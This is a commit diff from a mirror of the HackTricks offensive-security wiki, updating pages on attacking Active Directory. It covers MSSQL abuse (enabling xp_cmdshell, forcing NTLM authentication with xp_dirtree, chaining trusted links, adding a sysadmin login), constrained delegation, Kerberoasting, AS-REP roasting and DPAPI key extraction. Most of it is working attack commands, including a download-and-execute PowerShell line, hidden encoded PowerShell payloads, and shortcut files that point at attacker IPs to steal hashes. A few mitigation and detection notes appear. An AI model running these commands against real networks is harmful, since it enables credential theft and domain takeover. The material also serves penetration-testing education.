Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [#3389] No subject

Browse source
This commit is contained in:
CPol 2022-08-15 13:00:19 +00:00 committed by gitbook-bot
parent 47bedbff68
commit b340d48881
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
10 changed files with 209 additions and 81 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
SUMMARY.md
View file

@ -167,7 +167,7 @@
* [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md)
* [Kerberos Authentication](windows-hardening/active-directory-methodology/kerberos-authentication.md)
* [Kerberoast](windows-hardening/active-directory-methodology/kerberoast.md)
* [MSSQL Trusted Links](windows-hardening/active-directory-methodology/mssql-trusted-links.md)
* [MSSQL AD Abuse](windows-hardening/active-directory-methodology/abusing-ad-mssql.md)
* [Over Pass the Hash/Pass the Key](windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md)
* [Pass the Ticket](windows-hardening/active-directory-methodology/pass-the-ticket.md)
* [Password Spraying](windows-hardening/active-directory-methodology/password-spraying.md)

19
network-services-pentesting/pentesting-mssql-microsoft-sql-server.md
View file

@ -16,20 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="warning" %}
**Support HackTricks and get benefits!**
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover **The PEASS Family**, our collection of exclusive **NFTs**
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
{% endhint %}
## Basic Information
**Microsoft SQL Server** is a [relational database management system](https://en.wikipedia.org/wiki/Relational\_database\_management\_system) developed by [Microsoft](https://en.wikipedia.org/wiki/Microsoft). As a [database server](https://en.wikipedia.org/wiki/Database\_server), it is a [software product](https://en.wikipedia.org/wiki/Software\_product) with the primary function of storing and retrieving data as requested by other [software applications](https://en.wikipedia.org/wiki/Software\_application)—which may run either on the same computer or on another computer across a network (including the Internet).\
@ -116,6 +102,9 @@ crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
#Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'
# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
#this turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
@ -142,7 +131,7 @@ msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
### Abusing MSSQL trusted Links
[**Read this post**](../windows-hardening/active-directory-methodology/mssql-trusted-links.md) **to find more information about how to abuse this feature**
[**Read this post**](../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature**
### **Read files executing scripts (Python and R)**

6
windows-hardening/active-directory-methodology/README.md
View file

@ -204,12 +204,12 @@ This attack aims to **use the user NTLM hash to request Kerberos tickets**, as a
This attack is similar to Pass the Key, but instead of using hashes to request a ticket, the **ticket itself is stolen** and used to authenticate as its owner.\
[**More information about Pass the Ticket here**](pass-the-ticket.md)**.**
### MSSQL Trusted Links
### MSSQL Abuse & Trusted Links
If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA).\
If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA), **steal** the NetNTLM **hash** or even perform a **relay** **attack**.\
Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. These trusts can be chained and at some point the user might be able to find a misconfigured database where he can execute commands.\
**The links between databases work even across forest trusts.**\
[**More information about this technique here.**](mssql-trusted-links.md)
[**More information about this technique here.**](abusing-ad-mssql.md)
### Unconstrained Delegation

138
windows-hardening/active-directory-methodology/mssql-trusted-links.md → windows-hardening/active-directory-methodology/abusing-ad-mssql.md
View file

@ -1,4 +1,4 @@
# MSSQL Trusted Links
# MSSQL AD Abuse
<details>
@ -16,19 +16,18 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
## MSSQL Trusted Links
## **MSSQL Enumeration / Discovery**
If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA).\
Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. This trusts can be chained and at some point the user might be able to find some misconfigured database where he can execute commands.
The powershell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case.
**The links between databases work even across forest trusts.**
### **Powershell**
```bash
```powershell
Import-Module .\PowerupSQL.psd1
```
#Get local MSSQL instance (if any)
### Enumerating from the network without domain session
```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
@ -39,8 +38,15 @@ Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP Verbose Threads
#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
```
### Enumerating from inside the domain
```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
# FROM INSIDE OF THE DOMAIN
#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
@ -51,9 +57,71 @@ Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose
#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
# Get DBs, test connections and get info in oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
```
## MSSQL Basic Abuse
### Access DB
```powershell
#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"
#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
```
### MSSQL xp\_dirtree abuse
Executing something such as `EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1` will make the MSSQL server to **login** to the specified **IP address**.
### Steal NetNTLM hash / Relay attack
Using **`xp_dirtree`** it's possible to **force** a NTLM **authentication**, therefore it's possible to **steal** the NetNTLM **hash** or even perform a **relay attack**.
Using tools such as **responder** or **Inveigh** it's possible to **steal the NetNTLM hash**.\
You can see how to use these tools in:
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
{% endcontent-ref %}
### MSSQL RCE
It might be also possible to **execute commands** inside the MSSQL host
```powershell
Invoke-SQLOSCmd -Instance "srv-1.dev.cyberbotic.io,1433" -Command "whoami" -RawResults
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
```
If **manually** you could just use:&#x20;
<pre class="language-sql"><code class="lang-sql"><strong>#To enumerate the current state of xp_cmdshell
</strong>SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
# A value of 0 shows that xp_cmdshell is disabled. To enable it:
sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;
# Execute
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'powershell -w hidden -enc &#x3C;blah>';</code></pre>
### MSSQL Extra
{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server.md" %}
[pentesting-mssql-microsoft-sql-server.md](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server.md)
{% endcontent-ref %}
## MSSQL Trusted Links
If a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. This trusts can be chained and at some point the user might be able to find some misconfigured database where he can execute commands.
**The links between databases work even across forest trusts.**
### Powershell Abuse
```powershell
#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
@ -90,35 +158,51 @@ Notice that metasploit will try to abuse only the `openquery()` function in MSSQ
### Manual - Openquery()
From Linux you could obtain a MSSQL console shell with **sqsh** and **mssqlclient.py** and run queries like:
From **Linux** you could obtain a MSSQL console shell with **sqsh** and **mssqlclient.py.**
```bash
select * from openquery("DOMINIO\SERVER1",'select * from openquery("DOMINIO\SERVER2",''select * from master..sysservers'')')
```
From Windows you could also find the links and execute commands manually using a MSSQL client like [HeidiSQL](https://www.heidisql.com)
From **Windows** you could also find the links and execute commands manually using a **MSSQL client like** [**HeidiSQL**](https://www.heidisql.com)****
_Login using Windows authentication:_
![](<../../.gitbook/assets/image (167) (1).png>)
_Find links inside the accessible MSSQL server (in this case the link is to dcorp-sql1):_\
\_\_`select * from master..sysservers`
#### Find Trustable Links
```sql
select * from master..sysservers
```
![](<../../.gitbook/assets/image (168).png>)
Execute queries through the link (example: find more links in the new accessible instance):\
`select * from openquery("dcorp-sql1", 'select * from master..sysservers')`
#### Execute queries in trustable link
Execute queries through the link (example: find more links in the new accessible instance):
```sql
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
```
{% hint style="warning" %}
Check where double and single quotes are used, it's important to use them that way.
{% endhint %}
![](<../../.gitbook/assets/image (169).png>)
You can continue these trusted links chain forever manually.
Some times you won't be able to perform actions like `exec xp_cmdshell` from `openquery()` in those cases it might be worth it to test the following method:
```sql
# First level RCE
SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
# Second level RCE
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("<computer2>", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')
```
If you cannot perform actions like `exec xp_cmdshell` from `openquery()` try with the `EXECUTE` method.
### Manual - EXECUTE
You can also abuse trusted links using EXECUTE:
You can also abuse trusted links using `EXECUTE`:
```bash
#Create user and give admin privileges
@ -126,6 +210,14 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '')
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
```
## Local Privilege Escalation
The **MSSQL local user** usually has a special type of privilege called **`SeImpersonatePrivilege`**. This allows the account to "impersonate a client after authentication".
A strategy that many authors have come up with is to force a SYSTEM service to authenticate to a rogue or man-in-the-middle service that the attacker creates. This rogue service is then able to impersonate the SYSTEM service whilst it's trying to authenticate.
[SweetPotato](https://github.com/CCob/SweetPotato) has a collection of these various techniques which can be executed via Beacon's `execute-assembly` command.
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>

6
windows-hardening/active-directory-methodology/asreproast.md
View file

@ -50,11 +50,15 @@ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashc
{% code title="Using Windows" %}
```bash
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
```
{% endcode %}
{% hint style="warning" %}
AS-REP Roasting with Rubeus will generate a 4768 with an encryption type of 0x17 and preauth type of 0.
{% endhint %}
### Cracking
```

79
windows-hardening/active-directory-methodology/constrained-delegation.md
View file

@ -1,4 +1,4 @@
# Constrained Delegation
<details>
@ -16,54 +16,88 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
## Constrained Delegation
# Constrained Delegation
Using this a Domain admin can **allow** a computer to **impersonate a user or computer** against a **service** of a machine.
Using this a Domain admin can allow 3rd parties to impersonate a user or computer against a service of a machine.
* **Service for User to self (**_**S4U2self**_**):** If a **service account** has a _userAccountControl_ value containing [TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D), then it can obtains a TGS for itself (the service) on behalf of any other user.
* **Service for User to self (**_**S4U2self**_**):** If a **service account** has a _userAccountControl_ value containing [TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D), then it can obtain a TGS for itself (the service) on behalf of any other user.
* **Service for User to Proxy(**_**S4U2proxy**_**):** A **service account** could obtain a TGS on behalf any user to the service set in **msDS-AllowedToDelegateTo.** To do so, it first need a TGS from that user to itself, but it can use S4U2self to obtain that TGS before requesting the other one.
**Note**: If a user is marked as _Account is sensitive and cannot be delegated_ in AD, you will **not be able to impersonate** them.
This means that if you **compromise the hash of the service** you can **impersonate users** and obtain **access** on their behalf to the **service configured** (possible **privesc**).\
Also, you **won't only have access to the service that user is able to impersonate, but also to any service that uses the same account as the allowed one** (because the SPN is not being checked, only privileges). For example, if you have access to **CIFS service** you can also have access to **HOST service**.\
Moreover, notice that if you have access to **LDAP service on DC**, you will have enough privileges to exploit a **DCSync**.
This means that if you **compromise the hash of the service** you can **impersonate users** and obtain **access** on their behalf to the **service configured** (possible **privesc**).
{% code title="Enumerate from Powerview" %}
Moreover, you **won't only have access to the service that the user is able to impersonate, but also to any service** because the SPN (the service name requested) is not being checked, only privileges. Therefore, if you have access to **CIFS service** you can also have access to **HOST service** using `/altservice` flag in Rubeus.
Also, **LDAP service access on DC**, is what is needed to exploit a **DCSync**.
{% code title="Enumerate" %}
```bash
# Powerview
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
#ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json
```
{% endcode %}
{% code title="Using kekeo.exe + Mimikatz.exe" %}
```bash
#Obtain a TGT for the Constained allowed user
<pre class="language-bash" data-title="Get TGT"><code class="lang-bash"># The first step is to get a TGT of the service taht can impersonate others
## If you are SYSTEM in the server, you might take it from memory
.\Rubeus.exe triage
.\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap
# If you are SYSTEM, you might get the AES key or the RC4 hash from memory and request one
## Get AES/RC4 with mimikatz
mimikatz sekurlsa::ekeys
## Request with aes
<strong>tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05
</strong>.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /opsec /nowrap
# Request with RC4
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)
tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL
#Load the TGS in memory
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
```
{% endcode %}
.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi</code></pre>
{% hint style="warning" %}
There are **other ways to obtain a TGT ticket** or the **RC4** or **AES256** without being SYSTEM in the computer like the Printer Bug and unconstrain delegation, NTLM relaying and Active Directory Certificate Service abuse
**Just having that TGT ticket (or hashed) you can perform this attack without compromising the whole computer.**
{% endhint %}
{% code title="Using Rubeus" %}
```bash
#Obtain a TGT for the Constained allowed user
.\Rubeus.exe asktgt /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi
#Obtain a TGS of the Administrator user to self
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator
#Obtain service TGS impersonating Administrator (CIFS)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS
#Impersonate Administrator on different service (HOST)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST
# Get S4U TGS + Service impersonated ticket in 1 cmd (instead of 2)
\.Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /user:dcorp-adminsrv$ /ticket:TGT_websvc.kirbi /nowrap
#Load ticket in memory
.\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local
```
{% endcode %}
## Mitigation
{% code title="kekeo + Mimikatz" %}
```bash
#Obtain a TGT for the Constained allowed user
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)
tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL
#Load the TGS in memory
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
```
{% endcode %}
### Mitigation
* Disable kerberos delegation where possible
* Limit DA/Admin logins to specific services
@ -71,7 +105,6 @@ Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.
[**More information in ired.team.**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation)
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -87,5 +120,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

24
windows-hardening/active-directory-methodology/kerberoast.md
View file

@ -1,4 +1,4 @@
# Kerberoast
<details>
@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# Kerberoast
## Kerberoast
The goal of **Kerberoasting** is to harvest **TGS tickets for services that run on behalf of user accounts** in the AD, not computer accounts. Thus, **part** of these TGS **tickets are** **encrypted** with **keys** derived from user passwords. As a consequence, their credentials could be **cracked offline**.\
You can know that a **user account** is being used as a **service** because the property **"ServicePrincipalName"** is **not null**.
@ -50,14 +49,24 @@ Invoke-Mimikatz -Command '"kerberos::list /export"' #Export tickets to current f
{% code title="From Windows" %}
```bash
# Powerview
Request-SPNTicket -SPN "<SPN>" #Using PowerView Ex: MSSQLSvc/mgmt.domain.local
# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #Specific user
# Invoke-Kerberoast
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
```
{% endcode %}
## Cracking
{% hint style="warning" %}
When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated.
{% endhint %}
### Cracking
```
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
@ -65,7 +74,7 @@ hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```
## Persistence
### Persistence
If you have **enough permissions** over a user you can **make it kerberoastable**:
@ -77,7 +86,7 @@ You can find useful **tools** for **kerberoast** attacks here: [https://github.c
If you find this **error** from Linux: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** it because of your local time, you need to synchronise the host with the DC: `ntpdate <IP of DC>`
## Mitigation
### Mitigation
Kerberoast is very stealthy if exploitable
@ -98,7 +107,6 @@ Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{
**More information about Kerberoasting in ired.team in** [**here** ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)**and** [**here**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)**.**
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -114,5 +122,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

6
windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
View file

@ -81,6 +81,12 @@ If you are already inside the Windows machine you can force Windows to connect t
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt
```
### MSSQL
```sql
EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
```
## HTML injection
### Via email

8
windows-hardening/ntlm/places-to-steal-ntlm-creds.md
View file

@ -237,7 +237,7 @@ IconIndex=1337
We can create a shortcut containing our network path and as you as you open the shortcut Windows will try to resolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can give the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll located in the system32 directory.
```
```powershell
Set shl = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
currentFolder = shl.CurrentDirectory
@ -254,7 +254,7 @@ sc.Save
The Powershell version.
```
```powershell
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
@ -269,7 +269,7 @@ $lnk.Save()
Another shortcut in Windows is the Internet shortcuts. You can save this as something.url
```
```bash
echo [InternetShortcut] > stealMyHashes.url
echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url
```
@ -301,7 +301,7 @@ Start-Process \\192.168.0.1\aa
IE will resolve UNC paths. For example
```
```html
<img src="\\\\192.168.0.1\\aa">
```

2
windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
View file

@ -117,7 +117,7 @@ For where you can extract the master key with mimikatz:
<pre class="language-bash"><code class="lang-bash"><strong># If you know the users password
</strong><strong>dpapi::masterkey /in:"C:\Users\&#x3C;username>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /sid:S-1-5-21-2552734371-813931464-1050690807-1106 /password:123456 /protected
</strong><strong>
</strong><strong># If you don't
</strong><strong># If you don't have the users password and inside an AD
</strong>dpapi::masterkey /in:"C:\Users\&#x3C;username>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /rpc</code></pre>
The master key of the file will appear in the output.